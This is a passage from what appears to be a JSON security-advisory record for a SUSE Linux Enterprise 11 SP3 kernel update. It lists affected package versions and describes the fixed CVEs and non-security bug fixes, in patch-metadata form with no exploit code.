Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-devel-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-trace-devel", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-3.0.101-0.40.1.ppc64.rpm", "packageName": "kernel-trace", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-ppc64-3.0.101-0.40.1.ppc64.rpm", "packageName": "kernel-ppc64", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-syms-3.0.101-0.40.1.ia64.rpm", "packageName": "kernel-syms", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-xen-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-xen", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-xen-devel-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-xen-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "2_3.0.101_0.40-0.16.104", "packageFilename": "gfs2-kmp-default-2_3.0.101_0.40-0.16.104.s390x.rpm", "packageName": "gfs2-kmp-default", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-source-3.0.101-0.40.1.ia64.rpm", "packageName": "kernel-source", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "4.2.4_04_3.0.101_0.40-0.7.3", "packageFilename": "xen-kmp-default-4.2.4_04_3.0.101_0.40-0.7.3.x86_64.rpm", "packageName": "xen-kmp-default", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-ec2-devel-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-ec2-devel", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-base-3.0.101-0.40.1.s390x.rpm", "packageName": "kernel-default-base", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-pae-devel-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-pae-devel", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-syms-3.0.101-0.40.1.ppc64.rpm", "packageName": "kernel-syms", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.6_3.0.101_0.40-0.20.98", "packageFilename": "ocfs2-kmp-ppc64-1.6_3.0.101_0.40-0.20.98.ppc64.rpm", "packageName": "ocfs2-kmp-ppc64", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-ec2-base-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-ec2-base", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.6_3.0.101_0.40-0.20.98", "packageFilename": "ocfs2-kmp-pae-1.6_3.0.101_0.40-0.20.98.i586.rpm", "packageName": "ocfs2-kmp-pae", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Real Time Extension", "OSVersion": "11.3", "packageVersion": "1.4_3.0.101_rt130_0.28-2.27.99", "packageFilename": "cluster-network-kmp-rt-1.4_3.0.101_rt130_0.28-2.27.99.x86_64.rpm", "packageName": "cluster-network-kmp-rt", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Real Time Extension", "OSVersion": "11.3", "packageVersion": "1.6_3.0.101_rt130_0.28-0.20.99", "packageFilename": "ocfs2-kmp-rt-1.6_3.0.101_rt130_0.28-0.20.99.x86_64.rpm", "packageName": "ocfs2-kmp-rt", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.6_3.0.101_0.40-0.20.98", "packageFilename": "ocfs2-kmp-trace-1.6_3.0.101_0.40-0.20.98.i586.rpm", "packageName": "ocfs2-kmp-trace", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-xen-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-xen", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-syms-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-syms", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-base-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-default-base", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-pae-extra-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-pae-extra", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "2_3.0.101_0.40-0.16.104", "packageFilename": "gfs2-kmp-trace-2_3.0.101_0.40-0.16.104.x86_64.rpm", "packageName": "gfs2-kmp-trace", "arch": "x86_64", "operator": "lt"}, {"OS": "SLE SERVER Unsupported Extras", "OSVersion": "11", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-extra-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-default-extra", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-source-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-source", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-devel-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-trace-devel", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-base-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-default-base", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-base-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-trace-base", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-pae-base-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-pae-base", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.6_3.0.101_0.40-0.20.98", "packageFilename": "ocfs2-kmp-trace-1.6_3.0.101_0.40-0.20.98.s390x.rpm", "packageName": "ocfs2-kmp-trace", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Real Time Extension", "OSVersion": "11.3", "packageVersion": "8.4.4_3.0.101_rt130_0.28-0.22.65", "packageFilename": "drbd-kmp-rt-8.4.4_3.0.101_rt130_0.28-0.22.65.x86_64.rpm", "packageName": "drbd-kmp-rt", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Real Time Extension", "OSVersion": "11.3", "packageVersion": "1.6_3.0.101_rt130_0.28-0.20.99", "packageFilename": "ocfs2-kmp-rt_trace-1.6_3.0.101_rt130_0.28-0.20.99.x86_64.rpm", "packageName": "ocfs2-kmp-rt_trace", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-syms-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-syms", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.4_3.0.101_0.40-2.27.98", "packageFilename": "cluster-network-kmp-trace-1.4_3.0.101_0.40-2.27.98.s390x.rpm", "packageName": "cluster-network-kmp-trace", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.6_3.0.101_0.40-0.20.98", "packageFilename": "ocfs2-kmp-trace-1.6_3.0.101_0.40-0.20.98.x86_64.rpm", "packageName": "ocfs2-kmp-trace", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "2_3.0.101_0.40-0.16.104", "packageFilename": "gfs2-kmp-default-2_3.0.101_0.40-0.16.104.i586.rpm", "packageName": "gfs2-kmp-default", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "2_3.0.101_0.40-0.16.104", "packageFilename": "gfs2-kmp-xen-2_3.0.101_0.40-0.16.104.i586.rpm", "packageName": "gfs2-kmp-xen", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.4_3.0.101_0.40-2.27.98", "packageFilename": "cluster-network-kmp-default-1.4_3.0.101_0.40-2.27.98.ia64.rpm", "packageName": "cluster-network-kmp-default", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Real Time Extension", "OSVersion": "11.3", "packageVersion": "8.4.4_3.0.101_rt130_0.28-0.22.65", "packageFilename": "drbd-kmp-rt_trace-8.4.4_3.0.101_rt130_0.28-0.22.65.x86_64.rpm", "packageName": "drbd-kmp-rt_trace", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-xen-devel-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-xen-devel", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-devel-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-default-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-base-3.0.101-0.40.1.ppc64.rpm", "packageName": "kernel-default-base", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.4_3.0.101_0.40-2.27.98", "packageFilename": "cluster-network-kmp-trace-1.4_3.0.101_0.40-2.27.98.i586.rpm", "packageName": "cluster-network-kmp-trace", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Real Time Extension", "OSVersion": "11.3", "packageVersion": "3.0.101.rt130-0.28.1", "packageFilename": "kernel-rt_trace-3.0.101.rt130-0.28.1.x86_64.rpm", "packageName": "kernel-rt_trace", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.4_3.0.101_0.40-2.27.98", "packageFilename": "cluster-network-kmp-xen-1.4_3.0.101_0.40-2.27.98.i586.rpm", "packageName": "cluster-network-kmp-xen", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-devel-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-default-devel", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.6_3.0.101_0.40-0.20.98", "packageFilename": "ocfs2-kmp-default-1.6_3.0.101_0.40-0.20.98.i586.rpm", "packageName": "ocfs2-kmp-default", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.6_3.0.101_0.40-0.20.98", "packageFilename": "ocfs2-kmp-default-1.6_3.0.101_0.40-0.20.98.ia64.rpm", "packageName": "ocfs2-kmp-default", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Real Time Extension", "OSVersion": "11.3", "packageVersion": "3.0.101.rt130-0.28.1", "packageFilename": "kernel-rt-devel-3.0.101.rt130-0.28.1.x86_64.rpm", "packageName": "kernel-rt-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.4_3.0.101_0.40-2.27.98", "packageFilename": "cluster-network-kmp-default-1.4_3.0.101_0.40-2.27.98.i586.rpm", "packageName": "cluster-network-kmp-default", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-ppc64-base-3.0.101-0.40.1.ppc64.rpm", "packageName": "kernel-ppc64-base", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-devel-3.0.101-0.40.1.s390x.rpm", "packageName": "kernel-default-devel", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-man-3.0.101-0.40.1.s390x.rpm", "packageName": "kernel-default-man", "arch": "s390x", "operator": "lt"}], "description": "The SUSE Linux Enterprise 11 Service Pack 3 kernel has been updated to fix\n various bugs and security issues.\n\n The following security bugs have been fixed:\n\n *\n\n CVE-2014-1739: The media_device_enum_entities function in\n drivers/media/media-device.c in the Linux kernel before 3.14.6 does not\n initialize a certain data structure, which allows local users to\n obtain sensitive information from kernel memory by leveraging\n /dev/media0 read access for a MEDIA_IOC_ENUM_ENTITIES ioctl call\n (bnc#882804).\n\n *\n\n CVE-2014-4171: mm/shmem.c in the Linux kernel through 3.15.1 does\n not properly implement the interaction between range notification and hole\n punching, which allows local users to cause a denial of service (i_mutex\n hold) by using the mmap system call to access a hole, as demonstrated by\n interfering with intended shmem activity by blocking completion of (1) an\n MADV_REMOVE madvise call or (2) an FALLOC_FL_PUNCH_HOLE fallocate call\n (bnc#883518).\n\n *\n\n CVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel\n through 3.15.1 on 32-bit x86 platforms, when syscall auditing is enabled\n and the sep CPU feature flag is set, allows local users to cause a denial\n of service (OOPS and system crash) via an invalid syscall number, as\n demonstrated by number 1000 (bnc#883724).\n\n *\n\n CVE-2014-4667: The sctp_association_free function in\n net/sctp/associola.c in the Linux kernel before 3.15.2 does not properly\n manage a certain backlog value, which allows remote attackers to cause a\n denial of service (socket outage) via a crafted SCTP packet (bnc#885422).\n\n *\n\n CVE-2014-4943: The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the\n Linux kernel through 3.15.6 allows local users to gain privileges by\n leveraging data-structure differences between an l2tp socket and an inet\n socket (bnc#887082).\n\n *\n\n CVE-2014-5077: The sctp_assoc_update function in\n net/sctp/associola.c in the Linux kernel through 3.15.8, when SCTP\n authentication is enabled, allows remote attackers to cause a denial of\n service (NULL pointer dereference and OOPS) by starting to establish an\n association between two endpoints immediately after an exchange of INIT\n and INIT ACK chunks to establish an earlier association between these\n endpoints in the opposite direction (bnc#889173).\n\n *\n\n CVE-2014-5471: Stack consumption vulnerability in the\n parse_rock_ridge_inode_internal function in fs/isofs/rock.c in the Linux\n kernel through 3.16.1 allows local users to cause a denial of service\n (uncontrolled recursion, and system crash or reboot) via a crafted iso9660\n image with a CL entry referring to a directory entry that has a CL entry.\n (bnc#892490)\n\n *\n\n CVE-2014-5472: The parse_rock_ridge_inode_internal function in\n fs/isofs/rock.c in the Linux kernel through 3.16.1 allows local users to\n cause a denial of service (unkillable mount process) via a crafted iso9660\n image with a self-referential CL entry. (bnc#892490)\n\n *\n\n CVE-2014-2706: Race condition in the mac80211 subsystem in the Linux\n kernel before 3.13.7 allows remote attackers to cause a denial of service\n (system crash) via network traffic that improperly interacts with the\n WLAN_STA_PS_STA state (aka power-save mode), related to sta_info.c and\n tx.c. (bnc#871797)\n\n *\n\n CVE-2014-4027: The rd_build_device_space function in\n drivers/target/target_core_rd.c in the Linux kernel before 3.14 does not\n properly initialize a certain data structure, which allows local users to\n obtain sensitive information from ramdisk_mcp memory by leveraging access\n to a SCSI initiator. (bnc#882639)\n\n *\n\n CVE-2014-3153 The futex_requeue function in kernel/futex.c in the\n Linux kernel through 3.14.5 does not ensure that calls have two different\n futex addresses, which allows local users to gain privileges via a crafted\n FUTEX_REQUEUE command that facilitates unsafe waiter modification.\n (bnc#880892)\n\n *\n\n CVE-2014-6410: Avoid infinite loop when processing indirect ICBs\n (bnc#896689)\n\n The following non-security bugs have been fixed:\n\n * ACPI / PAD: call schedule() when need_resched() is true (bnc#866911).\n * ACPI: Fix bug when ACPI reset register is implemented in system\n memory (bnc#882900).\n * ACPI: Limit access to custom_method (bnc#884333).\n * ALSA: hda - Enabling Realtek ALC 671 codec (bnc#891746).\n * Add option to automatically enforce module signatures when in Secure\n Boot mode (bnc#884333).\n * Add secure_modules() call (bnc#884333).\n * Add wait_on_atomic_t() and wake_up_atomic_t() (bnc#880344).\n * Backported new patches of Lock down functions for UEFI secure boot\n Also updated series.conf and removed old patches.\n * Btrfs: Return EXDEV for cross file system snapshot.\n * Btrfs: abort the transaction when we does not find our extent ref.\n * Btrfs: avoid warning bomb of btrfs_invalidate_inodes.\n * Btrfs: cancel scrub on transaction abortion.\n * Btrfs: correctly set profile flags on seqlock retry.\n * Btrfs: does not check nodes for extent items.\n * Btrfs: fix a possible deadlock between scrub and transaction\n committing.\n * Btrfs: fix corruption after write/fsync failure + fsync + log\n recovery (bnc#894200).\n * Btrfs: fix csum tree corruption, duplicate and outdated checksums\n (bnc#891619).\n * Btrfs: fix double free in find_lock_delalloc_range.\n * Btrfs: fix possible memory leak in btrfs_create_tree().\n * Btrfs: fix use of uninit "ret" in end_extent_writepage().\n * Btrfs: free delayed node outside of root->inode_lock (bnc#866864).\n * Btrfs: make DEV_INFO ioctl available to anyone.\n * Btrfs: make FS_INFO ioctl available to anyone.\n * Btrfs: make device scan less noisy.\n * Btrfs: make sure there are not any read requests before stopping\n workers.\n * Btrfs: more efficient io tree navigation on wait_extent_bit.\n * Btrfs: output warning instead of error when loading free space cache\n failed.\n * Btrfs: retrieve more info from FS_INFO ioctl.\n * Btrfs: return EPERM when deleting a default subvolume (bnc#869934).\n * Btrfs: unset DCACHE_DISCONNECTED when mounting default subvol\n (bnc#866615).\n * Btrfs: use right type to get real comparison.\n * Btrfs: wake up @scrub_pause_wait as much as we can.\n * Btrfs: wake up transaction thread upon remount.\n * CacheFiles: Add missing retrieval completions (bnc#880344).\n * CacheFiles: Does not try to dump the index key if the cookie has\n been cleared (bnc#880344).\n * CacheFiles: Downgrade the requirements passed to the allocator\n (bnc#880344).\n * CacheFiles: Fix the marking of cached pages (bnc#880344).\n * CacheFiles: Implement invalidation (bnc#880344).\n * CacheFiles: Make some debugging statements conditional (bnc#880344).\n * Drivers: hv: util: Fix a bug in the KVP code (bnc#886840).\n * Drivers: hv: vmbus: Fix a bug in the channel callback dispatch code\n (bnc#886840).\n * FS-Cache: Add transition to handle invalidate immediately after\n lookup (bnc#880344).\n * FS-Cache: Check that there are no read ops when cookie relinquished\n (bnc#880344).\n * FS-Cache: Clear remaining page count on retrieval cancellation\n (bnc#880344).\n * FS-Cache: Convert the object event ID #defines into an enum\n (bnc#880344).\n * FS-Cache: Does not sleep in page release if __GFP_FS is not set\n (bnc#880344).\n * FS-Cache: Does not use spin_is_locked() in assertions (bnc#880344).\n * FS-Cache: Exclusive op submission can BUG if there is been an I/O\n error (bnc#880344).\n * FS-Cache: Fix __wait_on_atomic_t() to call the action func if the\n counter != 0 (bnc#880344).\n * FS-Cache: Fix object state machine to have separate work and wait\n states (bnc#880344).\n * FS-Cache: Fix operation state management and accounting (bnc#880344).\n * FS-Cache: Fix signal handling during waits (bnc#880344).\n * FS-Cache: Initialise the object event mask with the calculated mask\n (bnc#880344).\n * FS-Cache: Limit the number of I/O error reports for a cache\n (bnc#880344).\n * FS-Cache: Make cookie relinquishment wait for outstanding reads\n (bnc#880344).\n * FS-Cache: Mark cancellation of in-progress operation (bnc#880344).\n * FS-Cache: One of the write operation paths doeses not set the object\n state (bnc#880344).\n * FS-Cache: Provide proper invalidation (bnc#880344).\n * FS-Cache: Simplify cookie retention for fscache_objects, fixing oops\n (bnc#880344).\n * FS-Cache: The retrieval remaining-pages counter needs to be atomic_t\n (bnc#880344).\n * FS-Cache: Uninline fscache_object_init() (bnc#880344).\n * FS-Cache: Wrap checks on object state (bnc#880344).\n * HID: usbhid: add always-poll quirk (bnc#888607).\n * HID: usbhid: enable always-poll quirk for Elan Touchscreen\n (bnc#888607).\n * IB/iser: Add TIMEWAIT_EXIT event handling (bnc#890297).\n * Ignore "flags" change to event_constraint (bnc#876114).\n * Ignore data_src/weight changes to perf_sample_data (bnc#876114).\n * NFS: Allow more operations in an NFSv4.1 request (bnc#890513).\n * NFS: Clean up helper function nfs4_select_rw_stateid() (bnc#888968).\n * NFS: Does not copy read delegation stateids in setattr (bnc#888968).\n * NFS: Does not use a delegation to open a file when returning that\n delegation (bnc#888968, bnc#892200, bnc#893596, bnc#893496)\n * NFS: Fixes for NFS RCU-walk support in line with code going upstream\n * NFS: Use FS-Cache invalidation (bnc#880344).\n * NFS: allow lockless access to access_cache (bnc#866130).\n * NFS: avoid mountpoint being displayed as " (deleted)" in\n /proc/mounts (bnc#888591).\n * NFS: nfs4_do_open should add negative results to the dcache\n (bnc#866130).\n * NFS: nfs_migrate_page() does not wait for FS-Cache to finish with a\n page (bnc#880344).\n * NFS: nfs_open_revalidate: only evaluate parent if it will be used\n (bnc#866130).\n * NFS: prepare for RCU-walk support but pushing tests later in code\n (bnc#866130).\n * NFS: support RCU_WALK in nfs_permission() (bnc#866130).\n * NFS: teach nfs_lookup_verify_inode to handle LOOKUP_RCU (bnc#866130).\n * NFS: teach nfs_neg_need_reval to understand LOOKUP_RCU (bnc#866130).\n * NFSD: Does not hand out delegations for 30 seconds after recalling\n them (bnc#880370).\n * NFSv4 set open access operation call flag in nfs4_init_opendata_res\n (bnc#888968, bnc#892200, bnc#893596, bnc#893496).\n * NFSv4: Add a helper for encoding opaque data (bnc#888968).\n * NFSv4: Add a helper for encoding stateids (bnc#888968).\n * NFSv4: Add helpers for basic copying of stateids (bnc#888968).\n * NFSv4: Clean up nfs4_select_rw_stateid() (bnc#888968).\n * NFSv4: Fix the return value of nfs4_select_rw_stateid (bnc#888968).\n * NFSv4: Rename nfs4_copy_stateid() (bnc#888968).\n * NFSv4: Resend the READ/WRITE RPC call if a stateid change causes an\n error (bnc#888968).\n * NFSv4: Simplify the struct nfs4_stateid (bnc#888968).\n * NFSv4: The stateid must remain the same for replayed RPC calls\n (bnc#888968).\n * NFSv4: nfs4_stateid_is_current should return "true" for an invalid\n stateid (bnc#888968).\n * One more fix for kABI breakage.\n * PCI: Lock down BAR access when module security is enabled\n (bnc#884333).\n * PCI: enable MPS "performance" setting to properly handle bridge MPS\n (bnc#883376).\n * PM / Hibernate: Add memory_rtree_find_bit function (bnc#860441).\n * PM / Hibernate: Create a Radix-Tree to store memory bitmap\n (bnc#860441).\n * PM / Hibernate: Implement position keeping in radix tree\n (bnc#860441).\n * PM / Hibernate: Iterate over set bits instead of PFNs in\n swsusp_free() (bnc#860441).\n * PM / Hibernate: Remove the old memory-bitmap implementation\n (bnc#860441).\n * PM / Hibernate: Touch Soft Lockup Watchdog in rtree_next_node\n (bnc#860441).\n * Restrict /dev/mem and /dev/kmem when module loading is restricted\n (bnc#884333).\n * Reuse existing "state" field to indicate PERF_X86_EVENT_PEBS_LDLAT\n (bnc#876114).\n * USB: handle LPM errors during device suspend correctly (bnc#849123).\n * Update kabi files to reflect fscache change (bnc#880344)\n * Update x86_64 config files: re-enable SENSORS_W83627EHF (bnc#891281)\n * VFS: Make more complete truncate operation available to CacheFiles\n (bnc#880344).\n * [FEAT NET1222] ib_uverbs: Allow explicit mmio trigger (FATE#83366,\n ltc#83367).\n * acpi: Ignore acpi_rsdp kernel parameter when module loading is\n restricted (bnc#884333).\n * af_iucv: correct cleanup if listen backlog is full (bnc#885262,\n LTC#111728).\n * asus-wmi: Restrict debugfs interface when module loading is\n restricted (bnc#884333).\n * autofs4: allow RCU-walk to walk through autofs4 (bnc#866130).\n * autofs4: avoid taking fs_lock during rcu-walk (bnc#866130).\n * autofs4: does not take spinlock when not needed in\n autofs4_lookup_expiring (bnc#866130).\n * autofs4: factor should_expire() out of autofs4_expire_indirect\n (bnc#866130).\n * autofs4: make "autofs4_can_expire" idempotent (bnc#866130).\n * autofs4: remove a redundant assignment (bnc#866130).\n * autofs: fix lockref lookup (bnc#888591).\n * be2net: add dma_mapping_error() check for dma_map_page()\n (bnc#881759).\n * block: add cond_resched() to potentially long running ioctl discard\n loop (bnc#884725).\n * block: fix race between request completion and timeout handling\n (bnc#881051).\n * cdc-ether: clean packet filter upon probe (bnc#876017).\n * cpuset: Fix memory allocator deadlock (bnc#876590).\n * crypto: Allow CRYPTO_FIPS without MODULE_SIGNATURES. Not all archs\n have them, but some are FIPS certified, with some kernel support.\n * crypto: fips - only panic on bad/missing crypto mod signatures\n (bnc#887503).\n * crypto: testmgr - allow aesni-intel and ghash_clmulni-intel in fips\n mode (bnc#889451).\n * dasd: validate request size before building CCW/TCW (bnc#891087,\n LTC#114068).\n * dm mpath: fix race condition between multipath_dtr and pg_init_done\n (bnc#826486).\n * dm-mpath: fix panic on deleting sg device (bnc#870161).\n * drm/ast: AST2000 cannot be detected correctly (bnc#895983).\n * drm/ast: Actually load DP501 firmware when required (bnc#895608\n bnc#871134).\n * drm/ast: Add missing entry to dclk_table[].\n * drm/ast: Add reduced non reduced mode parsing for wide screen mode\n (bnc#892723).\n * drm/ast: initial DP501 support (v0.2) (bnc#871134).\n * drm/ast: open key before detect chips (bnc#895983).\n * drm/i915: Fix up cpt pixel multiplier enable sequence (bnc#879304).\n * drm/i915: Only apply DPMS to the encoder if enabled (bnc#893064).\n * drm/i915: clear the FPGA_DBG_RM_NOCLAIM bit at driver init\n (bnc#869055).\n * drm/i915: create functions for the "unclaimed register" checks\n (bnc#869055).\n * drm/i915: use FPGA_DBG for the "unclaimed register" checks\n (bnc#869055).\n * drm/mgag200: Initialize data needed to map fbdev memory (bnc\n #806990).\n * e1000e: enable support for new device IDs (bnc#885509).\n * fs/fscache: remove spin_lock() from the condition in while()\n (bnc#880344).\n * hibernate: Disable in a signed modules environment (bnc#884333).\n * hugetlb: does not use ERR_PTR with VM_FAULT* values\n * ibmvscsi: Abort init sequence during error recovery (bnc#885382).\n * ibmvscsi: Add memory barriers for send / receive (bnc#885382).\n * inet: add a redirect generation id in inetpeer (bnc#860593).\n * inetpeer: initialize ->redirect_genid in inet_getpeer() (bnc#860593).\n * ipv6: tcp: fix tcp_v6_conn_request() (bnc#887645).\n * kabi: hide bnc#860593 changes of struct inetpeer_addr_base\n (bnc#860593).\n * kernel: 3215 tty hang (bnc#891087, LTC#114562).\n * kernel: fix data corruption when reading /proc/sysinfo (bnc#891087,\n LTC#114480).\n * kernel: fix kernel oops with load of fpc register (bnc#889061,\n LTC#113596).\n * kernel: sclp console tty reference counting (bnc#891087, LTC#115466).\n * kexec: Disable at runtime if the kernel enforces module loading\n restrictions (bnc#884333).\n * md/raid6: avoid data corruption during recovery of double-degraded\n RAID6.\n * memcg, vmscan: Fix forced scan of anonymous pages (memory reclaim\n fix).\n * memcg: do not expose uninitialized mem_cgroup_per_node to world\n (bnc#883096).\n * mm, hugetlb: add VM_NORESERVE check in vma_has_reserves()\n * mm, hugetlb: change variable name reservations to resv\n * mm, hugetlb: decrement reserve count if VM_NORESERVE alloc page cache\n * mm, hugetlb: defer freeing pages when gathering surplus pages\n * mm, hugetlb: do not use a page in page cache for cow optimization\n * mm, hugetlb: fix and clean-up node iteration code to alloc or free\n * mm, hugetlb: fix race in region tracking\n * mm, hugetlb: fix subpool accounting handling\n * mm, hugetlb: improve page-fault scalability\n * mm, hugetlb: improve, cleanup resv_map parameters\n * mm, hugetlb: move up the code which check availability of free huge\n page\n * mm, hugetlb: protect reserved pages when soft offlining a hugepage\n * mm, hugetlb: remove decrement_hugepage_resv_vma()\n * mm, hugetlb: remove redundant list_empty check in\n gather_surplus_pages()\n * mm, hugetlb: remove resv_map_put\n * mm, hugetlb: 